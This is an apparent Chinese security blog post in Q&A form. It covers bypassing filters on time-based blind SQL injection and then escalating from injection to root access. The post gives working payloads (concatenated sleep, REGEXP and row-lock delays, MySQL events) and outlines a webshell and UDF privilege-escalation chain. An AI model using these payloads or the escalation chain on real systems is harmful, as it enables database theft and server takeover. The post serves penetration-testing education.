继之前文章的补充：

WEB安全--SQL注入--bypass技巧_sql注入过滤空格-CSDN博客

Q1：发现sql注入的时间盲注时，如果时间盲注的函数都被过滤了，怎么办？

除了找其他函数替换、编码等方式，还有以下方式绕过：

1、尝试其他注入手段是否有效果，比如报错注入、DNSLog外带等；

2、将被过滤的函数以拼接的方式呈现（如果正则验证不严格可能绕过）：

SELECT /*!50000sleep*/(5);
SELECT s||l||e||e||p(5);  -- Oracle
SELECT sle+ep(5);  --MSSQL

3、利用其他延时机制模拟相同效果：

        笛卡尔积+大量数据处理（MySQL）

SELECT COUNT(*) FROM large_table1, large_table2, large_table3 WHERE ...

        递归（MSSQL/PostgreSQL）

WITH RECURSIVE t(n) AS (SELECT 1 UNION ALL SELECT n+1 FROM t WHERE n < 1000000
)
SELECT * FROM t;

4、响应包判断：

所谓sql时间盲注指页面没有任何回显，但实际情况下响应包的内容可能会因为请求的sql语句而产生细微变化。

根据这一特性，我们可以尝试用普通的真假条件语句结合响应包中的内容去判断，可以将此sql时间盲注转化为类似布尔盲注的形式。

?id=1' AND (condition) --+

5、构造事件：

构造一个事件或触发器，让它执行慢查询或利用其副作用来判断条件是否成立（要有写权限）。

CREATE EVENT myevent ON SCHEDULE AT CURRENT_TIMESTAMP + INTERVAL 5 SECOND DO SELECT 1;

6、正则匹配：

某些复杂的正则或字符串处理函数在不同的输入下计算量不同，可造成微小但可检测的延迟。

1' AND IF(ASCII(SUBSTRING((SELECT user()),1,1)) > 100, 'A' REGEXP BINARY REPEAT('A',1000000), 1)--+

7、加锁操作延时：

如果条件不成立，快速返回； 

如果条件成立→ 查询 users 中 id=1 并对其加锁，当前连接挂起等待锁释放（通常可控制几秒）

1' AND IF(ASCII(SUBSTRING((SELECT user()),1,1)) > 100, (SELECT 1 FROM users WHERE id=1 FOR UPDATE), 1)--+

Q2、在服务器权限为普通用户是，sql注入如何获取服务器root权限？

判断注入的类型

判断数据库类型、版本等信息

判断当前用户权限（至少需要有文件写权限）

        sql注入将webshell写入服务器web目录中（需要知道物理路径）==> 服务器脚本提权 ==> 在蚁剑中执行系统命令

        上传.dll/.so文件（需要知道物理路径）==> 进行系统提权（UDF） ==> 在数据库命令行执行系统命令